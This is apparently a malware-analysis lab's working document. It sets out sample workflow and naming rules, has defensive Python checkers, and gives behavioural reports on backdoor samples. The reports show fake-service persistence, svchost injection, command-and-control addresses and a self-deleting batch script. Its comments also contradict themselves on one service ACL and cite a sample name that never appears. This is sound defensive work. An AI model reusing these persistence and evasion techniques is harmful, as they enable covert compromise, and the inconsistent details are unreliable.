I. Lab overview
1. Lab members
2. Sample collection and submission workflow
3. Virus pack test rules
4. Naming rules for analyzed samples
5. Workflow diagram
II. Analysis reports
1. Backdoor2008.12.24@001
2. Backdoor2008.12.24@002
3. Backdoor2008.12.24@003
4. Backdoor2008.12.24@004
5. Backdoor2008.12.24@005
6. Backdoor2008.12.24@006
7. Trojan2008.12.24@001
8. Trojan2008.12.24@002
9. Trojan2008.12.24@003
10. Trojan2008.12.24@004
11. Trojan2008.12.24@005
12. Trojan2008.12.24@006
13. Trojan2008.12.24@007
14. Trojan2008.12.24@008
15. Trojan2008.12.24@009
16. Virus2008.12.24@001
17. Worm2008.12.24@001
18. Worm2008.12.24@002
19. Worm2008.12.24@003
III. Anti-virus software test reports
1. A-Squared Anti-Malware 4.0
2. Avira Antivir Personal
3. 費爾托斯特 (Filseclab) V7R3
4. SearchGUI
5. Kaspersky Internet Security 8.0
6. Dr.Web anti-virus
7. Symantec Endpoint Security
8. McAfee VirusScan Plus
9. TrendMicro OfficeScan
10. TrendMicro Internet Security
11. Kaspersky Anti-Virus
12. 江民 (Jiangmin) KV2008
13. Panda Internet Security
14. ESET NOD32 Antivirus
15. Norton Internet Security
16. PC Tools Internet Security
17. VBA32 Workstation 1
18. VBA32 Workstation 2
19. avast! Antivirus
Lab members
1. Virus collection group
integear, kitman231, 小韋, mizuhara, tdnj
2. Virus analysis group
zha0, asusp4b533, 000110, upside, integear, sylovanas
3. Anti-virus testing group
megakotaro, kitman231, Bug, integear, 戴計, JusticeH, PHT, 小韋, 小狄~, shisin, kennyg, ss30102, kingyeh, tdnj, imdino, lmam, w12345k, haol, no.20.fanks
4. Public relations and reporting group
JusticeH, ss30102
Sample collection and submission workflow
Virus collection group:
1. Collect EXE files as samples.
2. Upload samples compressed in ZIP format. The file name format is "<sample name (extension optional)>_cv_<member ID (members with a Chinese ID use their English equivalent)>.zip". Log in to the "CollectedVirus" folder of "VirusDatas" (see the FTP login instructions) and upload there.
Virus analysis group:
1. Download the sample from "CollectedVirus" under "VirusDatas" and delete it there, so that nobody analyzes it twice; then upload one copy of the original sample to "VirusBackup" for later reference.
2. After analysis, rename the sample (rules below) and upload it to "AnalyzedVirus" on the FTP server.
3. Send the analysis report to "AnalyzerReports" under "VirusReports". Reports are plain TXT files, for speed; the report file name is "<threat name after analysis>_ar_<member ID (members with a Chinese ID use their English equivalent)>".
Public relations and reporting group:
1. Seven days before each release (provisionally monthly), download all samples from "AnalyzedVirus" under "VirusReports" and bundle them into a sample pack named after the release date, e.g. "AVPClubVirusPack_2009.01.01".
2. Three days before release, start consolidating the material; on the last day, compile it into a PDF and publish it on the forum. The report is named after the release date, e.g. "ACVL_VirReport_2009.01.01".
Anti-virus testing group:
1. Download the sample pack from "FinalVirusPack" under "VirusDatas", run the test, and upload the report (example format below) to "AntiVirusSoftwaresReports" under "VirusReports". The report file name is "<anti-virus product name>_avsr_<member ID (members with a Chinese ID use their English equivalent)>.txt".
2. Reports must be uploaded no later than 3 days before each monthly "AVPClub VirLab Prevalent Threat Research Report" is released.
Virus pack test rules
1. Save the report as a TXT file in the following format and submit it to group 4 (public relations and reporting):
Anti-virus software: full product name (e.g. AVPClub AntiVirus Plus)
Version: the vendor's own build number (e.g. Kaspersky "8.0.0.506", F-PROT "6.0.9.1", ESET "3.0.684")
Signature date: the date of the test (e.g. 2008/01/01)
Heuristic setting: high / medium / basic / default (default means the product does not let the user change the heuristic level)
Test environment: operating system (e.g. Windows Vista Ultimate SP1 x86)
Notes: optional; write "none" if there are none
Scanner reported: detected 19 / scanned 58
Actual file count: 19 (as seen on disk)
Removed: 19 (as seen on disk)
Remaining: 0 (as seen on disk)
Not detected: 0 (as seen on disk)
Detected, quarantine only: 0
Detected but not removed: 0
Detected, no action possible: 0
Detection rate: 19/19=100.0%
Removal rate: 19/19=100.0%
Remaining file names:
none
Detected but not removed file names:
none
Detected, quarantine only file names:
none
Detected, no action possible file names:
none
Tester: member ID (e.g. Bug)
The scanner's own counters are recorded only for reference: the "scanned" figure can exceed the number of files in the pack (58 against 19 in the example) because scanners count archive members and embedded objects separately. All counts used for the rates are therefore taken from what is actually left in the test folder.
2. Once the testing group is told that the virus pack is ready, the report is due to group 4 within 1 to 3 weeks.
3. If the result differs depending on the heuristic setting, submit two or more reports, one per setting.
4. If you cannot deliver a report, say so in advance.
5. Any other settings go in the "Notes" field.
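The counts in the template above are entered by hand from what is visible in the test folder, so the easiest mistake is numbers that do not add up (a file counted in two buckets, or a rate copied from an earlier run). The following checker is an added example, not a tool the lab published; it parses a report in the format above and verifies the arithmetic. It assumes that every file in the pack falls into exactly one outcome bucket (removed, quarantine only, detected but not removed, no action possible, or not detected), which is how the template reads. The two sample reports are constructed for the example.

```python
import re

# Added example: consistency check for a virus-pack test report.
# Assumption: each file lands in exactly one outcome bucket.

FIELDS = {
    "actual file count": "actual",
    "removed": "removed",
    "remaining": "remaining",
    "not detected": "undetected",
    "detected, quarantine only": "quarantine_only",
    "detected but not removed": "not_removed",
    "detected, no action possible": "no_action",
}
RATE_RE = re.compile(r"(\d+)\s*/\s*(\d+)\s*=\s*([\d.]+)%")


def format_rate(numerator, denominator):
    """Rate in the report's own notation, e.g. 17/19=89.5%."""
    if denominator == 0:
        return "0/0=n/a"
    return "%d/%d=%.1f%%" % (numerator, denominator, 100.0 * numerator / denominator)


def parse_report(text):
    """Pull the counts and the two rate lines out of a report; other fields are ignored."""
    report = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        key = key.strip().lower()
        if key in FIELDS:
            m = re.match(r"\s*(\d+)", value)  # "19 (as seen on disk)" -> 19
            if m:
                report[FIELDS[key]] = int(m.group(1))
        elif key in ("detection rate", "removal rate") and RATE_RE.search(value):
            report[key.replace(" ", "_")] = value.strip()
    return report


def validate(report):
    """Return a list of inconsistencies; an empty list means the numbers add up."""
    needed = set(FIELDS.values()) | {"detection_rate", "removal_rate"}
    missing = sorted(needed - set(report))
    if missing:
        return ["missing fields: " + ", ".join(missing)]
    r, problems = report, []
    detected = r["actual"] - r["undetected"]
    buckets = (r["removed"] + r["quarantine_only"] + r["not_removed"]
               + r["no_action"] + r["undetected"])
    if buckets != r["actual"]:
        problems.append("outcome buckets sum to %d but actual file count is %d"
                        % (buckets, r["actual"]))
    if r["remaining"] != r["actual"] - r["removed"]:
        problems.append("remaining should be actual - removed = %d, report says %d"
                        % (r["actual"] - r["removed"], r["remaining"]))
    expected = format_rate(detected, r["actual"])
    if r["detection_rate"] != expected:
        problems.append("detection rate should be %s, report says %s" % (expected, r["detection_rate"]))
    expected = format_rate(r["removed"], r["actual"])
    if r["removal_rate"] != expected:
        problems.append("removal rate should be %s, report says %s" % (expected, r["removal_rate"]))
    return problems


# Constructed input: the template filled in as in the example above.
GOOD_REPORT = """\
Anti-virus software: AVPClub AntiVirus Plus
Version: 8.0.0.506
Signature date: 2008/01/01
Heuristic setting: default
Test environment: Windows Vista Ultimate SP1 x86
Notes: none
Scanner reported: detected 19 / scanned 58
Actual file count: 19 (as seen on disk)
Removed: 19 (as seen on disk)
Remaining: 0 (as seen on disk)
Not detected: 0 (as seen on disk)
Detected, quarantine only: 0
Detected but not removed: 0
Detected, no action possible: 0
Detection rate: 19/19=100.0%
Removal rate: 19/19=100.0%
Tester: Bug
"""
# Constructed input with typical slips: a file counted twice and a stale removal rate.
BAD_REPORT = (GOOD_REPORT.replace("Removed: 19", "Removed: 18")
              .replace("Detected but not removed: 0", "Detected but not removed: 2"))

if __name__ == "__main__":
    for label, text in (("good", GOOD_REPORT), ("bad", BAD_REPORT)):
        print(label, validate(parse_report(text)) or "consistent")
```

Run it on a submitted report before it goes to group 4; a non-empty list is the reason to send the report back rather than fix the numbers in the monthly summary.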
Naming rules for analyzed samples
Following suggestions from several members, the names of samples uploaded by the virus analysis group are standardized here. The scheme is based on Trend Micro's naming convention:
<primary behaviour>!<secondary behaviour>_<sequence number>
When uploading, follow the "count off" rule: if someone has already uploaded 001, the next upload is named 002, regardless of sample type.
Examples:
TROJ!DownLoader_001_ad_<member ID> (trojan; secondary behaviour "downloader")
WORM!DownLoader_002_ad_<member ID> (worm; secondary behaviour "downloader")
BKDR!AutoRun_003_ad_<member ID> (backdoor; secondary behaviour "autorun")
VIRS!KillFiles_005_ad_<member ID> (virus; secondary behaviour "deletes files")
VIRS!Inject_006_ad_<member ID> (virus; secondary behaviour "infects files")
TSPY!PWStealer_007_ad_<member ID> (spyware; secondary behaviour "password stealer")
TADE!DownLoader_008_ad_<member ID> (adware; secondary behaviour "downloader")
DIAL!PWStealer_009_ad_<member ID> (dialer; secondary behaviour "password stealer")
TROJ!PWStealer_010_ad_<member ID> (trojan; secondary behaviour "password stealer")
If you have questions, PM me.
When assembling the sample pack, the public relations and reporting group only needs to strip the trailing "_ad_<member ID>" from each name.
Note: in effect from the second report onwards.
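The file-name conventions in the submission workflow and the naming rules above are the only thing that ties a sample to its collector, its analyst and its place in the monthly pack, so they are worth checking mechanically. The following validator is an added example, not a tool from the lab: it recognises the four name formats (collected ZIP, analyzed sample, analyst report, AV test report), applies the "count off" rule to find the next sequence number, reports numbers that two uploaders claimed at once, and produces the pack name with the "_ad_<member ID>" suffix removed. Member IDs in the sample data are placeholders.

```python
import re

# Added example: validators for the AVPClub VirLab naming conventions.
# Member names in the tests below are placeholders, not real uploads.

COLLECTED_RE = re.compile(r"^(?P<sample>.+)_cv_(?P<member>.+?)\.zip$")
ANALYST_REPORT_RE = re.compile(r"^(?P<threat>.+)_ar_(?P<member>.+?)(?:\.txt)?$")
AV_REPORT_RE = re.compile(r"^(?P<product>.+)_avsr_(?P<member>.+?)\.txt$")
ANALYZED_RE = re.compile(
    r"^(?P<kind>TROJ|WORM|BKDR|VIRS|TSPY|TADE|DIAL)!(?P<behaviour>[A-Za-z]+)"
    r"_(?P<seq>\d{3})_ad_(?P<member>.+)$"
)


def parse_analyzed(name):
    """Fields of an analyzed-sample name, or None if it does not follow the rule."""
    m = ANALYZED_RE.match(name)
    return m.groupdict() if m else None


def next_sequence(existing):
    """'Count off' rule: the next number follows the highest one already uploaded, whatever its type."""
    used = [int(f["seq"]) for f in map(parse_analyzed, existing) if f]
    return "%03d" % (max(used) + 1 if used else 1)


def find_collisions(existing):
    """Sequence numbers claimed by more than one upload (the race the rule tries to avoid)."""
    by_seq = {}
    for name in existing:
        f = parse_analyzed(name)
        if f:
            by_seq.setdefault(f["seq"], []).append(name)
    return {seq: names for seq, names in by_seq.items() if len(names) > 1}


def pack_name(name):
    """Name of the sample inside the monthly pack: the trailing '_ad_<member>' is dropped."""
    f = parse_analyzed(name)
    if f is None:
        raise ValueError("not a valid analyzed-sample name: " + name)
    return "%s!%s_%s" % (f["kind"], f["behaviour"], f["seq"])


def classify_upload(name):
    """Which stage of the workflow a file name belongs to, or None if it matches no rule."""
    if COLLECTED_RE.match(name):
        return "collected"
    if ANALYZED_RE.match(name):
        return "analyzed"
    if AV_REPORT_RE.match(name):
        return "av_report"
    if ANALYST_REPORT_RE.match(name):
        return "analyst_report"
    return None


if __name__ == "__main__":
    uploaded = ["TROJ!DownLoader_001_ad_memberA", "WORM!DownLoader_002_ad_memberB",
                "BKDR!AutoRun_002_ad_memberC"]
    print("next number:", next_sequence(uploaded))
    print("collisions:", find_collisions(uploaded))
    print("pack names:", [pack_name(n) for n in uploaded])
```

Note that the collected-sample name seen later in this document ("cao_vcc_kitman231") does not use the "_cv_" tag the rule prescribes; the classifier returns None for it, which is exactly the kind of drift a check like this is meant to surface.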
Workflow diagram
(figure; not reproduced in this text)
Analysis report for 1.exe
General information:
Analysis date: 2008-12-06
Executable: yes
File type: EXE
Uploader: 000110
Analyst: 000110
Sample file name: Backdoor2008.12.24@001
Process tree:
1.exe
├ services.exe
│ └ liocal.exe
│
└ svchost.exe
  └ cmd.exe
Behaviour of 1.exe:
Creates files:
C:\WINDOWS\Liocal.exe
C:\Documents and Settings\[User Name]\Local Settings\Temp\GOLBUB.bat // the batch file name is 6 random letters
Writes files:
C:\WINDOWS\Liocal.exe
C:\Documents and Settings\[User Name]\Local Settings\Temp\GOLBUB.bat
Creates processes (path / program / arguments):
c:\windows\system32\ cmd.exe /c C:\DOCUME~1\[User Name]\LOCALS~1\Temp\GOLBUB.bat
Accesses the Service Control Manager:
c:\windows\system32\services.exe // dangerous: services.exe is made to install a service
Behaviour of services.exe:
Creates registry keys:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AVG Anti_Spyware Guard
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AVG Anti_Spyware Guard\Security
Sets registry values (all under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AVG Anti_Spyware Guard\):
Type = 0x00000110 (272)
Start = 0x00000002 (2) // start type "automatic": the service runs at every system start
ErrorControl = 0x00000000 (0)
ImagePath = C:\WINDOWS\Liocal.exe
DisplayName = AVG Anti_Spyware Guard
ObjectName = LocalSystem
Description = AVG Anti-Virus provides anti-virus services to applications and performs real-time protection
Security\Security = 01 00 14 80 90 00 00 00 9c 00 00 00 14 00 00 00 30 00 00 00 02 00 1c 00 01 00 00 00 02 80 14 00 ff 01 0f 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 fd 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 ff 01 0f 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8d 01 02 00 01 01 00 00 00 00 00 05 0b 00 00 00 00 00 18 00 fd 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
// the registry writes above create a service. The name, display name and description imitate AVG Anti-Spyware; Type 0x110 is "own process" plus "interactive", and the Security value is a self-relative security descriptor whose DACL grants full control to Administrators and LocalSystem only (the standard default for a newly created service, so the sample did not loosen the ACL).
Creates processes (path / program):
c:\windows\ liocal.exe // started by the SCM because the service is set to "automatic"
Behaviour of liocal.exe:
Creates processes (path / program / arguments):
C:\WINDOWS\system32\ svchost.exe 73412
Accesses the memory of another process:
c:\windows\system32\svchost.exe
Creates a thread in another process:
c:\windows\system32\svchost.exe
// writing into a freshly started svchost.exe and starting a thread in it is code injection; this is why the network connection below is attributed to svchost.exe rather than to liocal.exe
Behaviour of cmd.exe:
Deletes files:
C:\Documents and Settings\[User Name]\桌面\tavo\1.EXE
C:\Documents and Settings\[User Name]\Local Settings\Temp\GOLBUB.bat
Behaviour of svchost.exe:
Creates connection:
TCP - 124.226.42.36:2009
Additional information:
Other behaviour: none
Contents of GOLBUB.bat:
:try
del "C:\Documents and Settings\[User Name]\桌面\tavo\1.EXE"
if exist "C:\Documents and Settings\[User Name]\桌面\tavo\1.EXE" goto try
del %0
exit
// the loop keeps retrying until the original dropper has exited and can be deleted, then the batch file removes itself
Result:
Type: Backdoor
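The Security value in the report above is dumped as raw hex, and the Type and Start values as bare numbers, which leaves the reader to trust the inline comments. The block below is an added example (not part of the original report or of any vendor tool) that decodes them: it parses the self-relative SECURITY_DESCRIPTOR (header, owner and group SIDs, SACL and DACL with their ACEs), maps the SIDs to their well-known names and the access masks to service rights, and expands the Type and Start flags. The hex is copied from the report; the helper names and the small well-known-SID table are the example's own.

```python
import struct

# Added example: decode a Windows service security descriptor and its Type/Start values.

ACE_TYPES = {0: "ALLOW", 1: "DENY", 2: "AUDIT"}
SERVICE_TYPE_BITS = [(0x001, "KERNEL_DRIVER"), (0x002, "FILE_SYSTEM_DRIVER"),
                     (0x010, "WIN32_OWN_PROCESS"), (0x020, "WIN32_SHARE_PROCESS"),
                     (0x100, "INTERACTIVE_PROCESS")]
START_TYPES = {0: "BOOT_START", 1: "SYSTEM_START", 2: "AUTO_START", 3: "DEMAND_START", 4: "DISABLED"}
SERVICE_RIGHTS = [(0x0001, "QUERY_CONFIG"), (0x0002, "CHANGE_CONFIG"), (0x0004, "QUERY_STATUS"),
                  (0x0008, "ENUMERATE_DEPENDENTS"), (0x0010, "START"), (0x0020, "STOP"),
                  (0x0040, "PAUSE_CONTINUE"), (0x0080, "INTERROGATE"), (0x0100, "USER_DEFINED_CONTROL"),
                  (0x10000, "DELETE"), (0x20000, "READ_CONTROL"), (0x40000, "WRITE_DAC"),
                  (0x80000, "WRITE_OWNER")]
WELL_KNOWN_SIDS = {"S-1-1-0": "Everyone", "S-1-5-11": "Authenticated Users",
                   "S-1-5-18": "LocalSystem", "S-1-5-32-544": "Administrators",
                   "S-1-5-32-547": "Power Users"}

# The Security value exactly as listed in the report for "AVG Anti_Spyware Guard".
SECURITY_HEX = (
    "01 00 14 80 90 00 00 00 9c 00 00 00 14 00 00 00 30 00 00 00 02 00 1c 00 "
    "01 00 00 00 02 80 14 00 ff 01 0f 00 01 01 00 00 00 00 00 01 00 00 00 00 "
    "02 00 60 00 04 00 00 00 00 00 14 00 fd 01 02 00 01 01 00 00 00 00 00 05 "
    "12 00 00 00 00 00 18 00 ff 01 0f 00 01 02 00 00 00 00 00 05 20 00 00 00 "
    "20 02 00 00 00 00 14 00 8d 01 02 00 01 01 00 00 00 00 00 05 0b 00 00 00 "
    "00 00 18 00 fd 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 "
    "01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00"
)


def parse_sid(buf, off):
    """Decode a binary SID at buf[off]; returns (string form, offset past it)."""
    revision, sub_count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")  # 48-bit big-endian
    subs = struct.unpack_from("<%dI" % sub_count, buf, off + 8)
    sid = "S-%d-%d%s" % (revision, authority, "".join("-%d" % s for s in subs))
    return sid, off + 8 + 4 * sub_count


def parse_acl(buf, off):
    """Decode an ACL header and its ACEs (common layout: header, access mask, SID)."""
    _rev, _sbz1, _size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", buf, off)
    aces, pos = [], off + 8
    for _ in range(ace_count):
        ace_type, flags, ace_size = struct.unpack_from("<BBH", buf, pos)
        (mask,) = struct.unpack_from("<I", buf, pos + 4)
        sid, _ = parse_sid(buf, pos + 8)
        aces.append({"type": ACE_TYPES.get(ace_type, "0x%02x" % ace_type),
                     "flags": flags, "mask": mask, "sid": sid})
        pos += ace_size  # AceSize, not our own arithmetic, advances to the next ACE
    return aces


def parse_security_descriptor(hexdump):
    """Decode a self-relative SECURITY_DESCRIPTOR given as a space-separated hex dump."""
    buf = bytes.fromhex(hexdump)
    _rev, _sbz, control, o_owner, o_group, o_sacl, o_dacl = struct.unpack_from("<BBHIIII", buf, 0)
    if not control & 0x8000:  # SE_SELF_RELATIVE: offsets are relative to the buffer start
        raise ValueError("not a self-relative security descriptor")
    return {
        "owner": parse_sid(buf, o_owner)[0] if o_owner else None,
        "group": parse_sid(buf, o_group)[0] if o_group else None,
        "sacl": parse_acl(buf, o_sacl) if control & 0x0010 and o_sacl else [],  # SE_SACL_PRESENT
        "dacl": parse_acl(buf, o_dacl) if control & 0x0004 and o_dacl else [],  # SE_DACL_PRESENT
    }


def rights(mask):
    return [name for bit, name in SERVICE_RIGHTS if mask & bit]


def principal(sid):
    return WELL_KNOWN_SIDS.get(sid, sid)


def who_can(sd, right_bit):
    """Principals granted a given service right by an ALLOW ACE (this DACL has no DENY ACEs)."""
    return sorted(principal(a["sid"]) for a in sd["dacl"]
                  if a["type"] == "ALLOW" and a["mask"] & right_bit)


def service_type(value):
    return [name for bit, name in SERVICE_TYPE_BITS if value & bit]


if __name__ == "__main__":
    sd = parse_security_descriptor(SECURITY_HEX)
    print("owner:", principal(sd["owner"]), " group:", principal(sd["group"]))
    for ace in sd["sacl"] + sd["dacl"]:
        print("%-5s flags=0x%02x %-19s 0x%08x %s" % (ace["type"], ace["flags"],
              principal(ace["sid"]), ace["mask"], ", ".join(rights(ace["mask"]))))
    print("can start the service:", who_can(sd, 0x0010))
    print("can change its config:", who_can(sd, 0x0002))
    print("Type 0x110 =", service_type(0x110), " Start 2 =", START_TYPES[2])
```

For this descriptor the DACL has four ALLOW entries (LocalSystem and Power Users with everything except CHANGE_CONFIG, Administrators with SERVICE_ALL_ACCESS, Authenticated Users with query rights only) and the SACL holds one failed-access audit entry for Everyone; that is the default descriptor the SCM assigns to a new service, so it is not an indicator by itself. The check is still worth running on every dumped service key: a DACL that grants CHANGE_CONFIG or WRITE_DAC to Everyone or Authenticated Users is, unlike this one, a persistence weakness the sample introduced.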
Analysis report for 2.exe
General information:
Analysis date: 2008-12-03
Executable: yes
File type: EXE
Uploader: 000110
Analyst: 000110
Sample file name: Backdoor2008.12.24@002
Process tree:
2.exe
└ rundll32.exe
  └ services.exe
    └ svchost.exe
Behaviour of 2.exe:
Creates files:
C:\Documents and Settings\VMware\Local Settings\Temp\4.tmp
Writes files:
C:\Documents and Settings\VMware\Local Settings\Temp\4.tmp
Creates processes (path / program / arguments):
c:\windows\system32\ rundll32.exe "C:\DOCUME~1\VMware\LOCALS~1\Temp\4.tmp" "8A'?________[___[(_______'-6_ _'?窐'___'IU>#>"
// 4.tmp is a DLL loaded through rundll32.exe; the second argument is binary data, reproduced as captured
Behaviour of rundll32.exe:
Creates files:
C:\WINDOWS\system32\Local.dll
Writes files:
C:\WINDOWS\system32\Local.dll
Creates registry keys:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LocalService\Parameters
Sets registry values (path / name / value):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LocalService\ Description = "...(HID)... input access" // only a fragment survives in the source; it copies the wording of the built-in Human Interface Device Access service
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LocalService\Parameters\ ServiceDll = C:\WINDOWS\system32\Local.dll // the DLL that the "LocalService" service loads
Accesses the Service Control Manager:
c:\windows\system32\services.exe // dangerous: services.exe is made to install a service
Behaviour of services.exe:
Creates registry keys:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LocalService
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LocalService\Security
Sets registry values (all under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LocalService\):
Type = 0x00000110 (272)
Start = 0x00000002 (2) // start type "automatic": the service runs at every system start
ErrorControl = 0x00000000 (0)
ImagePath = C:\WINDOWS\system32\svchost.exe -k netsvcs
DisplayName = intreface Device Access
ObjectName = LocalSystem
Security\Security = 01 00 14 80 90 00 00 00 9c 00 00 00 14 00 00 00 30 00 00 00 02 00 1c 00 01 00 00 00 02 80 14 00 ff 01 0f 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 fd 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 ff 01 0f 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8d 01 02 00 01 01 00 00 00 00 00 05 0b 00 00 00 00 00 18 00 fd 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
// the registry writes above create a service hosted by svchost.exe in the netsvcs group, so no new process is visible: svchost.exe loads the DLL named by ServiceDll. The service name "LocalService" and the misspelled display name "intreface Device Access" are chosen to blend in with the built-in account and the built-in HID service. The Security value is byte-for-byte the same default descriptor as in sample 001. Note that a shared svchost normally only hosts services listed under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs; the trace does not show that list being modified, which is worth verifying when reproducing the sample.
Behaviour of svchost.exe:
Creates connection:
TCP - 123.147.0.145:8080
Additional information:
Other behaviour:
1. Because the service start type is "automatic", svchost.exe has loaded Local.dll.
Result:
Type: Backdoor
Sample name: AntivirusXP_016_MT3wM.exe
Type: Trojan-Backdoor
Sample file name: Backdoor2008.12.24@003
Uploader: kitman231
Analyst: asusp4b533
Analysis date: 20081206
Analysis tool: ThreatExpert
Executable: yes
Notes:
Allows remote machines to connect to the infected computer, i.e. opens a backdoor.
Analysis report for LiteVideocodecVer.4.exe
General information:
Analysis date: 2008-12-05
Executable: yes
File type: EXE
Uploader: integear
Analyst: integear
Process tree:
LiteVideocodecVer.4.exe // parent
└ SVCHOST.exe // dropped file
Behaviour of LiteVideocodecVer.4.exe:
Creates files:
SVCHOST.exe // dropped file
LiteVideocodecVer.4.exe // parent
Creates service:
SVCHOST (state: stopped)
Creates processes:
SVCHOST.exe // dropped file
LiteVideocodecVer.4.exe // parent
Creates registry entries:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SVCHOST]
Type = 0x00000110
Start = 0x00000002
ErrorControl = 0x00000000
ImagePath = "%Windir%\SVCHOST.exe"
DisplayName = "SVCHOST"
ObjectName = "LocalSystem"
Description = "ϵͳ..." // a GBK string read in the wrong code page; "ϵͳ" is the mojibake of "系统" (system), the rest is unrecoverable
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SVCHOST\Security]
Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0 (cut off in the source; the prefix matches the default service descriptor seen in samples 001 and 002)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SVCHOST\Enum]
0 = "Root\LEGACY_SVCHOST\0000"
Count = 0x00000001
NextInstance = 0x00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SVCHOST]
NextInstance = 0x00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SVCHOST\0000]
Service = "SVCHOST"
Legacy = 0x00000001
ConfigFlags = 0x00000000
Class = "LegacyDriver"
ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
DeviceDesc = "SVCHOST"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SVCHOST\0000\Control]
*NewlyCreated* = 0x00000000
ActiveService = "SVCHOST"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SVCHOST]
Type = 0x00000110
Start = 0x00000002
ErrorControl = 0x00000000
ImagePath = "%Windir%\SVCHOST.exe"
DisplayName = "SVCHOST"
ObjectName = "LocalSystem"
Description = "ϵͳ..." // same mis-encoded string as above
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SVCHOST\Security]
Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0 (cut off in the source)
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SVCHOST\Enum]
0 = "Root\LEGACY_SVCHOST\0000"
Count = 0x00000001
NextInstance = 0x00000001
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SVCHOST]
NextInstance = 0x00000001
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SVCHOST\0000]
Service = "SVCHOST"
Legacy = 0x00000001
ConfigFlags = 0x00000000
Class = "LegacyDriver"
ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
DeviceDesc = "SVCHOST"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SVCHOST\0000\Control]
*NewlyCreated* = 0x00000000
ActiveService = "SVCHOST"
// The service is named after the system's svchost.exe, but its ImagePath points at %Windir%\SVCHOST.exe; the genuine binary lives in %System% (the system32 folder), which is the quickest way to tell the two apart. The Enum\Root\LEGACY_SVCHOST entries are created by the Plug and Play manager for every new service and are a side effect of service creation, not a separate action of the sample. ControlSet001 mirrors CurrentControlSet on this machine, which is why every write appears twice.
Modifies registry entries:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ServiceCurrent]
(Default) = 0x0000000C
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ServiceCurrent]
(Default) = 0x0000000C
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
CachePath = "%Profiles%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
CachePath = "%Profiles%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
CachePath = "%Profiles%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
CachePath = "%Profiles%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
Directory = "%Profiles%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
